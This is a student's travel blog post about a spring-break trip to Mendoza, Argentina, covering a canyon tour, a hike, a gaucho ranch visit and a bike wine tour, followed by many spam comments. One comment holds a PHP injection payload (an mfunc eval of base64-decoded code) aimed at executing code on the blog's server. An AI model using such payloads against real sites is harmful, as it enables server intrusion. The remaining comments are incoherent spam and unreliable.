Mendoza

Posted by on October 24, 2013

My spring break adventure in Mendoza with my friends Louisa, Alex and Becca was nothing short of an adventure.  On day 1, we signed up for a tour of El Cañón del Atuel expecting to be hiking around, but instead we were whisked away in a van with 7 Argentine tourists, a warm-hearted bus driver, and a peppy tour guide.  We saw the beautiful, endless canyon and Alex even went rafting with other group members while Louisa and I risked our lives on a boat tour (aka the slowest boat ever that went in one circle but turned out to be fun).

Louisa, Alex and I in Canon del Atuel

On day 2 we hiked Cerro Arca, the last service mountain before the actual Andes Mountain range.  It was so beautiful to stand on the top of a mountain after 2 hours of hiking and look out at the city of Mendoza then turn around and see the Andes Mountains.

We love hiking!

Wofford spirit in front of the Andes Mountains

On day 3 we participated in “The Gaucho Experience” which consisted of a horseback ride across the Argentine countryside with a view of the Andes, an asado prepared by gauchos, and a restful sit around a campfire.

Gaucho Experience

Day 4: Mr. Hugo’s bike tour.  We were greeted with hugs and a crooked smile when we entered Mr. Hugo’s bike tour shop, just about a 40 minute bus ride from the center of the city.  Becca, Alex, Louisa and I each rented a bike and rode together on a plan-your-own wine tour.  We went to Familia Di’Tomaso where we had a tour and tasting led by a kind chica a little older than us who actually went to college to study wine.  We also had a tasting complete with multiple free sweets from the chef at Traipiche.  Here we were able to stand on the balcony over-looking rows and rows of perfectly aligned olive trees.  Our final stop was a tour of Entre Olivos where we learned all about olives (Did you know that green and black olives are the same olive? – green are just picked first before they turn black).  We ended the day back at Mr. Hugo’s with a glass of fruit juice and another round of hugs.

Mr. Hugo’s Bike Tour

While every event of the trip was an amazing experience, my favorite part was meeting people from all different nationalities and having to communicate by mixing all languages known to each individual in the conversation.  The other people in our “Experiencia Gaucho” were Brazilian and Peruvian; therefore, the connection between us was more difficult due to the differences in our languages.  However, when everyone – including the workers on the ranch – sat around the dinner table, something magical occurred.  There were people from the US, Canada, Argentina, Brazil, Peru and Chile and each person was speaking using every language he/she knew in order to communicate.  There was not one common language but nevertheless, we were all communicating and learning and laughing.  It was a beautiful moment.

Andes Mountains

Besos,

Ashlee

21 Responses to Mendoza

1. aparat sudura argon second hand

Hello my family member! I want to say that this post is amazing, nice written

and come with approximately all important infos.

I would like to see extra posts like this . shad_scaddan@arcor.de

2. Hepatitis A

i like this post, thanks

3. more info

I simply could not go away your web site prior to suggesting that I actually loved the standard info a person provide in your guests? Is gonna be again continuously to investigate cross-check new posts

4. MArco

<!–mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); –><!–/mfunc–>

5. Jay Henstrom

What is the finest technique to search designed for blogs you are interested in?

6. canada goose

capitale

7. Hermila Bucknell

Excellent beat ! I desire to apprentice while you amend your web locate, how can I subscribe for a blog web site? The account aided me a adequate deal. I had been tiny fragment acquainted of this your broadcast free sharp fair concept

8. visit the up coming webpage

e hookah Mendoza | Ashlee Moody

9. cheap snapback hats with free shipping

Hello, every time i used to check blog posts here early in the dawn, because i love

to find out more and more.

10. gạch mosaic kim cương

nhiều nhà cung cấp sản phẩm, dịch vụ quá, không biết chọn lựa đơn vị nào

11. football

Stick by your team through thick and thin, despite the wins and losses.

The advent from the internet has dramatically changed the way in which bets are placed on football or soccer.

Ole Miss and Mississippi State moving the Egg Bowl away from Jackson, Miss.

12. xbox 360 emulators for windows 7

xbox 360 emulator 2.6 latest bios

13. Womens Nike Free Run 3

4. If action is required, say so at the start of the e-mail. Don’t tell a long story with the requested action at the bottom. This is called the , but I also tend to call it “getting to the verb.”

14. Air Max 1

What i don’t realize is in reality how you are now not really much more well-favored than you may be now.

You’re so intelligent. You recognize therefore considerably in the case

of this subject, produced me for my part consider it from numerous varied angles.

Its like women and men don’t seem to be involved unless it’s one thing

to accomplish with Girl gaga! Your own stuffs outstanding.

All the time take care of it up!

15. moving calculator

It’s amazing in support of me to have a web site, which is beneficial designed for my know-how.

thanks admin

16. pyramid solitaire saga game for iphone

how to play pyramid solitaire game # 71

17. Nike Air Max Command

A fascinating discussion is definitely worth comment.

I do believe that you ought to publish more about this

subject, it may not be a taboo subject but usually people don’t discuss these subjects.

To the next! Kind regards!!

18. pyramid solitaire saga stuck on level 76

pyramid solitaire aarp games

19. CONVERSE

Your FRA is . It’s age 66 for people currently retiring, but it increases gradually to age 67 for people born in 1960 or later. Your benefits increase depending on the length of time you start Social Security benefits after your FRA, but there’s no increase for delaying past age 70.

20. Nike Air Max

Spot on with this write-up, I really believe that this site needs a lot more attention. I’ll probably

be returning to read through more, thanks for

the information!